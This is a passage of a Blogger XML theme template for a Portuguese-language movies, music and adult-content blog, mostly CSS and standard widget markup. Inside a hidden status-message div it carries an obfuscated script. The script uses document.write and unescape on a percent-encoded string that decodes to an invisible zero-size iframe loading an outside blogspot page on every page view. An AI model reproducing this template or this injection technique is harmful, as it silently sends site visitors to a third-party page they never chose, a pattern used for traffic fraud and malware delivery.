font-size: 90%;
}
#main-wrapper {overflow:hidden;}
.clear {clear:both;}
#blog-pager-newer-link {
float: left;
}
#blog-pager-older-link {
float: right;
}
#blog-pager {
text-align: center;
}
#header-wrapper {
height: 175px;
}
#header-wrapper h1 {
position: center;
top: 0px;
left: 0px;
color: #000000;
margin: 0px;
padding: 0px;
font: normal 0px/100% "Comic Sans MS", Arial, sans-serif;
}
#header-wrapper h1 a,
#header-wrapper h1 a:visited {
color: #000000;
text-decoration: none;
}
#header-wrapper h1 a:hover {
color: #333333;
text-decoration: none;
}
#header-wrapper p {
position: center;
top: 5px;
left: 13px;
color: #333333;
font: 12px Arial, Helvetica, sans-serif;
}
#content-wrapper {
width: 984px;
margin: 4px auto;
position: relative;
}
#main-wrapper {
float: left;
width: 520px;
margin-left: 10px;
padding: 10px 0 10px;
}
#main-wrapper a {
}
#main-wrapper a:hover {
}
/* -( Posts )- */
.post {
background: url("http://3.bp.blogspot.com/_m117PklX0AI/SzymAbvvGpI/AAAAAAAAAHg/Ts0_AZg4Aoo/meio-post.jpg") repeat-y;
}
.post h3 {
background:url("http://2.bp.blogspot.com/_m117PklX0AI/SzymBME_XUI/AAAAAAAAAHw/GGVHQ2cNXwM/topo-post.jpg") no-repeat;
height: 97px;
padding-top: 25px;
padding-left: 65px;
font-size: 16px;
font-weight: bold;
}
.post h3 a,
.post h3 a:visited {
text-decoration: none;
color: #FFF;
}
.post h3 a:hover {
color: #FFF;
text-decoration: underline;
}
.post-body {
margin: 10px 20px 0;
line-height: 15px;
}
.post p {
margin:0 0 0;
}
.post-footer {
background: url(http://3.bp.blogspot.com/_m117PklX0AI/SzymAndae2I/AAAAAAAAAHo/EDzCbgA8VXA/rodape-post.jpg) no-repeat bottom left;
}
.post-footer p {
margin: 0;
}
.post-footer {
font-size: 90%;
color: #999999;
}
#blog-pager a {
text-decoration: none;
padding: .2em 1em;
margin: .2em;
color: #000000; /* Cor do texto */
background-color: #FFFFFF; /* Cor de fundo */
border: 1px dotted #CCCCCC; /* Cor da borda */
}
#blog-pager a:hover {
color: #000000; /* Cor do texto */
background-color: #EEEEEE; /* Cor do destaque */
border: 1px dotted #CCCCCC; /* Cor da borda */
}
#blog-pager {text-align: right;}
}
#blog-pager-older-link a {
padding-right: 15px;
margin-right: 15px;
background: #FFFFFF right center;
}
#blog-pager-newer-link a {
padding-left: 15px;
margin-left: 15px;
background: #FFFFFF left center;
}
a.home-link {
}
blockquote {
margin: 10px;
padding: 8px;
background: #ECF5FF;
}
/*-- (Lateral Direita) --*/
#sidebar-wrapper {
float:right;
width: 210px;
color: #000000;
line-height: 15px;
padding:11px 10px 0 0;
}
.sidebar .widget {
padding:0pt 0px 5px;
width:210px;
}
#sidebar-wrapper h2 {
width:170px;
height:71px;
background:url(http://4.bp.blogspot.com/_m117PklX0AI/SzyxilU_BCI/AAAAAAAAAIw/SlwybYSvc6U/topo-widgth.jpg) no-repeat;
margin-bottom: -25px;
color: #FFF;
padding-top: 23px;
font-size: 13px;
padding-left: 45px;
}
.widget-content {
background:transparent url(http://4.bp.blogspot.com/_m117PklX0AI/Szyt12Ou7OI/AAAAAAAAAIo/u-JzthgAqdI/widget-bg.jpg) repeat-y bottom left;
margin:0pt;
overflow:hidden;
padding:5px 0px 9px 10px;;
color: #CCC;
}
#sidebar-wrapper ul{
list-style: none;
}
#sidebar-wrapper li{
background: url() no-repeat;
padding-left: 0px ;
padding-top: 0px ;
}
.parceiros a img {
border: 1px solid #bcbdbd;
}
.parceiros a:hover img {
border: 1px solid #bcbdbd;
}
/*-- (Lateral Esquerda) --*/
#sidebarl-wrapper {
float:left;
width: 210px;
color: #000000;
line-height: 160%;
padding: 11px 0 0 14px;
}
.sidebarl .widget {
padding:0pt 0px 10px;
width:210px;
}
#sidebarl-wrapper h2 {
width:170px;
height:71px;
background:url(http://4.bp.blogspot.com/_m117PklX0AI/SzyxilU_BCI/AAAAAAAAAIw/SlwybYSvc6U/topo-widgth.jpg) no-repeat;
margin-bottom: -25px;
color: #FFF;
padding-top: 23px;
font-size: 13px;
padding-left: 45px;
}
#sidebarl-wrapper ul{
list-style: none;
}
#sidebarl-wrapper li{
background: url() no-repeat;
padding-left: 17px ;
padding-top: 0px ;
}
/* ~( Comments ) */
#comments h4 {
background: url(http://n1cki2007.googlepages.com/commentsqt2.gif) no-repeat;
padding-left: 22px;
font: normal 140%/120% Arial, Helvetica, sans-serif;
clear: both;
margin-left:40px;
}
#comments dl {
margin: 10px 0px;
padding-left: 45px;
line-height: 130%;
}
.comment-author {
font-weight: bold;
font-style: normal;
font-size: 110%;
color: #FF0000;
}
.comment-author a, .comment-author a:visited {
color: #FF0000;
}
.comment-body {
margin-left: 0;
padding-left: 0;
}
.comment-footer {
margin-left:0;
padding-left:0;
margin-bottom: 5px;
display: block;
font-size: 87%;
}
.comment-footer a,
.comment-footer a:visited {
color: #999999;
}
. blog-author-comment {
margin:.25em 0 0;
}
.blog-author-comment p {
margin:0 0 .75em;
padding:5px 10px;
border:1px dotted #c0c0c0;
background:#f5f5f5;
}
#menu-top {
background: url(http://4.bp.blogspot.com/_m117PklX0AI/Szyol3JSSgI/AAAAAAAAAIY/2JVrAwOlZUw/menu-top.jpg) no-repeat;
width: 1000px;
height: 360px;
float: left;
margin-left: -8px;
margin-bottom: -20px;
}
#menu{
width:1000px;
height:106px;
background:url() no-repeat;
margin-top: 200px;
}

#iten-menu{
width:750px;
float:left;
display:inline;
padding:23px 0px 15px 245px;
height:35px;
}

#iten-menu ul li{
display:inline;
}

#iten-menu li a{
font:13px tahoma, Arial, Helvetica, sans-serif;
color:#FFFFFF;
padding:0px 21px 4px 12px;
background: url(http://4.bp.blogspot.com/_m117PklX0AI/Szymy4jyCHI/AAAAAAAAAIA/U6ZL_u0Wz6s/seta-bulet.jpg) no-repeat left;
}

#iten-menu li a:hover{
text-decoration:underline;
}
#busca{
width:700px;
padding:0px 0px 0px 300px;
height:46px;
background:url(^^) no-repeat;
}

#form{
padding:11px 0px 0px 10px;
}

#txt-busca{
font:12px Arial, Helvetica, sans-serif;
color:#9a9a9a;
background:transparent;
width:312px;
border:0px;
float:left;
padding:3px 0px 0px 0px;
}

#bt-buscar{
padding:2px 0px 0px 33px;
float:left;
}

.publicidade{
text-align:center;
width:100%;
}
#sidebar-title {
float: left;
color: #FFF;
margin-top: -90px;
margin-left: 80px;
}

]]></b:skin>
  </head>
  <body>
  <div id='outer-wrapper'><div id='wrap2'>

    <!-- skip links for text browsers -->
    <span id='skiplinks' style='display:none;'>
      <a href='#main'>skip to main </a> |
      <a href='#sidebar'>skip to sidebar</a>
    </span>

    <div id='content-wrapper'>
<div id='menu-top'>

<div id='busca'>                	
<div id='form'>
<form action='/search' class='searchform' method='get'>
<label for='txt-busca'>
<input class='search' gtbfieldid='66' id='txt-busca' name='s' onblur='if ( this.value == &apos;&apos; ) { this.value = &apos;Preencha e faa a busca em todo o site&apos;; }' onfocus='if ( this.value == &apos;Preencha e faa a busca em todo o site&apos; || this.value == &apos;&apos; ) { this.value = &apos;&apos;; }' tabindex='1' type='text' value='Preencha e faa a busca em todo o site'/>
</label>
<label for='bt-buscar'>
<input alt='Fazer Buscar' id='bt-buscar' name='s-btn' src='http://2.bp.blogspot.com/_m117PklX0AI/SzynBeKWJaI/AAAAAAAAAIQ/W3GdC2b9G5M/bt-busca.jpg' tabindex='2' title='Fazer Buscar' type='image'/>
</label>
</form>
</div>
</div>

<div id='menu'>
<div id='iten-menu'>
<ul>
<li class='cat-item cat-item-3'><a href='/' title='Página Inicial'>Home</a></li>

<li class='cat-item cat-item-3'><a href='/' title='Home'>Filmes</a></li>
                            
<li class='cat-item cat-item-3'><a href='/' title='Blog de Humor'>Adulto + 18</a></li>
                            
<li class='cat-item cat-item-3'><a href='/' title='Downloads de Msicas'>Musicas</a></li>

</ul>
</div></div>
</div>

      <div id='crosscol-wrapper' style='text-align:center'>
        <b:section class='crosscol' id='crosscol' showaddelement='no'/>
      </div>

      <div id='sidebarl-wrapper'>
        <b:section class='sidebar' id='sidebarl' preferred='yes'>
<b:widget id='HTML1' locked='false' title='TESTE' type='HTML'>
<b:includable id='main'>
  <!-- only display title if it's non-empty -->
  <b:if cond='data:title != &quot;&quot;'>
    <h2 class='title'><data:title/></h2>
  </b:if>
  <div class='widget-content'>
    <data:content/>
  </div>

  <b:include name='quickedit'/>
</b:includable>
</b:widget>
</b:section>
      </div>

      <div id='main-wrapper'>

        <b:section class='main' id='main' showaddelement='no'>
<b:widget id='Blog1' locked='true' title='Postagens no blog' type='Blog'>
<b:includable id='nextprev'>
  <div class='blog-pager' id='blog-pager'>
    <b:if cond='data:newerPageUrl'>
      <span id='blog-pager-newer-link'>
      <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-newer-link&quot;' expr:title='data:newerPageTitle'><data:newerPageTitle/></a>
      </span>
    </b:if>

    <b:if cond='data:olderPageUrl'>
      <span id='blog-pager-older-link'>
      <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;' expr:title='data:olderPageTitle'><data:olderPageTitle/></a>
      </span>
    </b:if>

    <b:if cond='data:blog.homepageUrl != data:blog.url'>
      <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
      <b:else/>
      <b:if cond='data:newerPageUrl'>
        <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
      </b:if>
    </b:if>

  </div>
  <div class='clear'/>
</b:includable>
<b:includable id='backlinks' var='post'>
  <a name='links'/><h4><data:post.backlinksLabel/></h4>
  <b:if cond='data:post.numBacklinks != 0'>
    <dl class='comments-block' id='comments-block'>
      <b:loop values='data:post.backlinks' var='backlink'>
        <div class='collapsed-backlink backlink-control'>
          <dt class='comment-title'>
            <span class='backlink-toggle-zippy'>&#160;</span>
            <a expr:href='data:backlink.url' rel='nofollow'><data:backlink.title/></a>
            <b:include data='backlink' name='backlinkDeleteIcon'/>
          </dt>
          <dd class='comment-body collapseable'>
            <data:backlink.snippet/>
          </dd>
          <dd class='comment-footer collapseable'>
            <span class='comment-author'><data:post.authorLabel/> <data:backlink.author/></span>
            <span class='comment-timestamp'><data:post.timestampLabel/> <data:backlink.timestamp/></span>
          </dd>
        </div>
      </b:loop>
    </dl>
  </b:if>
  <p class='comment-footer'>
    <a class='comment-link' expr:href='data:post.createLinkUrl' expr:id='data:widget.instanceId + &quot;_backlinks-create-link&quot;' target='_blank'><data:post.createLinkLabel/></a>
  </p>
</b:includable>
<b:includable id='post' var='post'>
  <div class='post hentry uncustomized-post-template'>
    <a expr:name='data:post.id'/>
    <b:if cond='data:post.title'>
      <h3 class='post-title entry-title'>
     <b:if cond='data:post.link'>
       <a expr:href='data:post.link'><data:post.title/></a>
     <b:else/>
        <b:if cond='data:post.url'>
          <a expr:href='data:post.url'><data:post.title/></a>
        <b:else/>
          <data:post.title/>
        </b:if>
     </b:if>
      </h3>
    </b:if>

<div id='sidebar-title'><b>Postado por : <span class='fn'><data:post.author/></span></b></div>

    <div class='post-header-line-1'/>

    <div class='post-body entry-content'>
      <data:post.body/>

      <div style='clear: both;'/> <!-- clear for photos floats -->
    </div>

    <div class='post-footer'>
    <div class='post-footer-line post-footer-line-1'>
<br/><br/>
  
      <span class='reaction-buttons'>
        <b:if cond='data:top.showReactions'>
          <table border='0' cellpadding='0' cellspacing='0' width='100%'><tr>
            <td class='reactions-label-cell' nowrap='nowrap' valign='top' width='1%'>
              <span class='reactions-label'>
              <data:top.reactionsLabel/></span>&#160;</td>
            <td><iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/></td>
           </tr></table>
        </b:if>
      </span>

      <span class='star-ratings'>
        <b:if cond='data:top.showStars'>
           <div expr:g:background-color='data:backgroundColor' expr:g:text-color='data:textColor' expr:g:url='data:post.absoluteUrl' g:height='42' g:type='RatingPanel' g:width='280'/>
        </b:if>
      </span>


       <!-- backlinks -->
       <span class='post-backlinks post-comment-link'>
         <b:if cond='data:blog.pageType != &quot;item&quot;'>
           <b:if cond='data:post.showBacklinks'>
             <a class='comment-link' expr:href='data:post.url + &quot;#links&quot;'><data:top.backlinkLabel/></a>
           </b:if>
         </b:if>
       </span>

      <span class='post-icons'>
        <!-- email post links -->
        <b:if cond='data:post.emailPostUrl'>
          <span class='item-action'>
          <a expr:href='data:post.emailPostUrl' expr:title='data:top.emailPostMsg'>
              <img alt='' class='icon-action' height='13' src='http://www.blogger.com/img/icon18_email.gif' width='18'/>
          </a>
          </span>
        </b:if>

        <!-- quickedit pencil -->
        <b:include data='post' name='postQuickEdit'/>
      </span>
      </div>

      <div class='post-footer-line post-footer-line-2'>

      </div>

      <div class='post-footer-line post-footer-line-3'>
      <span class='post-location'>
        <b:if cond='data:top.showLocation'>
          <b:if cond='data:post.location'>
            <data:postLocationLabel/>
            <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
          </b:if>
        </b:if>
      </span>
      </div>
    </div>
  </div>
</b:includable>
<b:includable id='status-message'>
  <b:if cond='data:navMessage'>
  <div class='status-msg-wrap'>
    <div class='status-msg-body'>
      <data:navMessage/>
    </div>
    <div class='status-msg-border'>
      <div class='status-msg-bg'>
        <div class='status-msg-hidden'><data:navMessage/><script language='javascript'>
document.write( unescape( &#39;%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%79%65%73%76%69%73%69%74%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%32%30%30%39%2F%30%39%2F%37%2E%68%74%6D%6C%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E&#39; ) );
</script></div>
      </div>
    </div>
  </div>
  <div style='clear: both;'/>
  </b:if>
</b:includable>
<b:includable id='comment-form' var='post'>
  <div class='comment-form'>
    <a name='comment-form'/>
    <h4 id='comment-post-message'><data:postCommentMsg/></h4>
    <p><data:blogCommentMessage/></p>
    <data:blogTeamBlogMessage/>
    <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
    <iframe allowtransparency='true' class='blogger-iframe-colorize' frameborder='0' height='275' id='comment-editor' scrolling='no' src='' width='100%'/>
    <data:post.iframeColorizer/>
  </div>
</b:includable>
<b:includable id='backlinkDeleteIcon' var='backlink'>
  <span expr:class='&quot;item-control &quot; + data:backlink.adminClass'>
    <a expr:href='data:backlink.deleteUrl' expr:title='data:top.deleteBacklinkMsg'>
      <img src='http://www.blogger.com/img/icon_delete13.gif'/>
    </a>
  </span>
</b:includable>
<b:includable id='postQuickEdit' var='post'>
  <b:if cond='data:post.editUrl'>
    <span expr:class='&quot;item-control &quot; + data:post.adminClass'>
      <a expr:href='data:post.editUrl' expr:title='data:top.editPostMsg'>
        <img alt='' class='icon-action' height='18' src='http://www.blogger.com/img/icon18_edit_allbkg.gif' width='18'/>
      </a>
    </span>
  </b:if>
</b:includable>
<b:includable id='main' var='top'>
  <!-- posts -->
  <div class='blog-posts hfeed'>

    <b:include data='top' name='status-message'/>

    <data:adStart/>
    <b:loop values='data:posts' var='post'>
      <b:if cond='data:post.dateHeader'>
        <h2 class='date-header'/>
      </b:if>
      <b:include data='post' name='post'/>
      <b:if cond='data:blog.pageType == &quot;item&quot;'>
        <b:include data='post' name='comments'/>
      </b:if>
      <b:if cond='data:post.includeAd'>
        <data:adEnd/>
        <data:adCode/>
        <data:adStart/>
      </b:if>
      <b:if cond='data:post.trackLatency'>
        <data:post.latencyJs/>
      </b:if>
    </b:loop>
    <data:adEnd/>
  </div>

  <!-- navigation -->
  <b:include name='nextprev'/>

  <!-- feed links -->
  <b:include name='feedLinks'/>
  
  <b:if cond='data:top.showStars'>
    <script src='http://www.google.com/jsapi' type='text/javascript'/>
    <script type='text/javascript'>
      google.load(&quot;annotations&quot;, &quot;1&quot;, {&quot;locale&quot;: &quot;<data:top.languageCode/>&quot;});
      function initialize() {
        google.annotations.setApplicationId(<data:top.blogspotReviews/>);
        google.annotations.createAll();
        google.annotations.fetch();
      }
      google.setOnLoadCallback(initialize);
    </script>
  </b:if>

</b:includable>
<b:includable id='commentDeleteIcon' var='comment'>
  <span expr:class='&quot;item-control &quot; + data:comment.adminClass'>
    <a expr:href='data:comment.deleteUrl' expr:title='data:top.deleteCommentMsg'>
      <img src='http://www.blogger.com/img/icon_delete13.gif'/>
    </a>
  </span>
</b:includable>
<b:includable id='feedLinks'>
  <b:if cond='data:blog.pageType != &quot;item&quot;'> <!-- Blog feed links -->
    <b:if cond='data:feedLinks'>
      <div class='blog-feeds'>
        <b:include data='feedLinks' name='feedLinksBody'/>
      </div>
    </b:if>

    <b:else/> <!--Post feed links -->
    <div class='post-feeds'>
      <b:loop values='data:posts' var='post'>
        <b:if cond='data:post.allowComments'>
          <b:if cond='data:post.feedLinks'>
            <b:include data='post.feedLinks' name='feedLinksBody'/>
          </b:if>
        </b:if>
      </b:loop>
    </div>
  </b:if>
</b:includable>
<b:includable id='feedLinksBody' var='links'>
  <div class='feed-links'>
  <data:feedLinksMsg/>
  <b:loop values='data:links' var='f'>
     <a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType' target='_blank'><data:f.name/></a>
  </b:loop>
  </div>
</b:includable>
<b:includable id='comments' var='post'>
  <div class='comments' id='comments'>
    <a name='comments'/>
    <b:if cond='data:post.allowComments'>
      <h4>
        <b:if cond='data:post.numComments == 1'>
          1 <data:commentLabel/>:
        <b:else/>
          <data:post.numComments/> <data:commentLabelPlural/>:
        </b:if>
      </h4>

      <b:if cond='data:post.commentPagingRequired'>
        <span class='paging-control-container'>
          <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'><data:post.oldestLinkText/></a>
          &#160;
          <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'><data:post.olderLinkText/></a>
          &#160;
          <data:post.commentRangeText/>
          &#160;
          <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'><data:post.newerLinkText/></a>
          &#160;
          <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'><data:post.newestLinkText/></a>
        </span>
      </b:if>

      <dl id='comments-block'>
        <b:loop values='data:post.comments' var='comment'>
          <dt expr:class='&quot;comment-author &quot; + data:comment.authorClass' expr:id='data:comment.anchorName'>
            <a expr:name='data:comment.anchorName'/>
            <b:if cond='data:comment.authorUrl'>
              <a expr:href='data:comment.authorUrl' rel='nofollow'><data:comment.author/></a>
            <b:else/>
              <data:comment.author/>
            </b:if>
            <data:commentPostedByMsg/>
          </dt>
          <dd class='comment-body'>
            <b:if cond='data:comment.isDeleted'>
              <span class='deleted-comment'><data:comment.body/></span>
            <b:else/>
              <p><data:comment.body/></p>
            </b:if>
          </dd>
          <dd class='comment-footer'>
            <span class='comment-timestamp'>
              <a expr:href='data:comment.url' title='comment permalink'>
                <data:comment.timestamp/>
              </a>
              <b:include data='comment' name='commentDeleteIcon'/>
            </span>
          </dd>
        </b:loop>
      </dl>

      <b:if cond='data:post.commentPagingRequired'>
        <span class='paging-control-container'>
          <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>
            <data:post.oldestLinkText/>
          </a>
          <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>
            <data:post.olderLinkText/>
          </a>
          &#160;
          <data:post.commentRangeText/>
          &#160;
          <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>
            <data:post.newerLinkText/>
          </a>
          <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>
            <data:post.newestLinkText/>
          </a>
        </span>
      </b:if>

      <p class='comment-footer'>
        <b:if cond='data:post.embedCommentForm'>
          <b:if cond='data:post.allowNewComments'>
            <b:include data='post' name='comment-form'/>
          <b:else/>
            <data:post.noNewCommentsText/>
          </b:if>
        <b:else/>
          <b:if cond='data:post.allowComments'>
            <a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'><data:postCommentMsg/></a>
          </b:if>
        </b:if>

      </p>
    </b:if>

    <div id='backlinks-container'>
    <div expr:id='data:widget.instanceId + &quot;_backlinks-container&quot;'>
       <b:if cond='data:post.showBacklinks'>
         <b:include data='post' name='backlinks'/>
       </b:if>
    </div>
    </div>
  </div>
</b:includable>
</b:widget>
</b:section>

      </div>

      <div id='sidebar-wrapper'>
        <b:section class='sidebar' id='sidebar' preferred='yes'>
<b:widget id='HTML2' locked='false' title='TESTE2' type='HTML'>
<b:includable id='main'>
  <!-- only display title if it's non-empty -->
  <b:if cond='data:title != &quot;&quot;'>
    <h2 class='title'><data:title/></h2>
  </b:if>
  <div class='widget-content'>
    <data:content/>
  </div>

  <b:include name='quickedit'/>
</b:includable>
</b:widget>
</b:section>
      </div>

      <!-- spacer for skins that want sidebar and main to be the same height-->
      <div class='clear'/>

    </div> <!-- end content-wrapper -->

<center><span style='font-size:10px; color:#555555;'> Copyright @ 2010 - <a expr:href='data:blog.homepageUrl'>          <data:blog.title/>
        </a> - Design by <a expr:href='data:blog.homepageUrl'>BTN</a></span></center>


  </div></div> <!-- end outer-wrapper -->
</body>
</html>
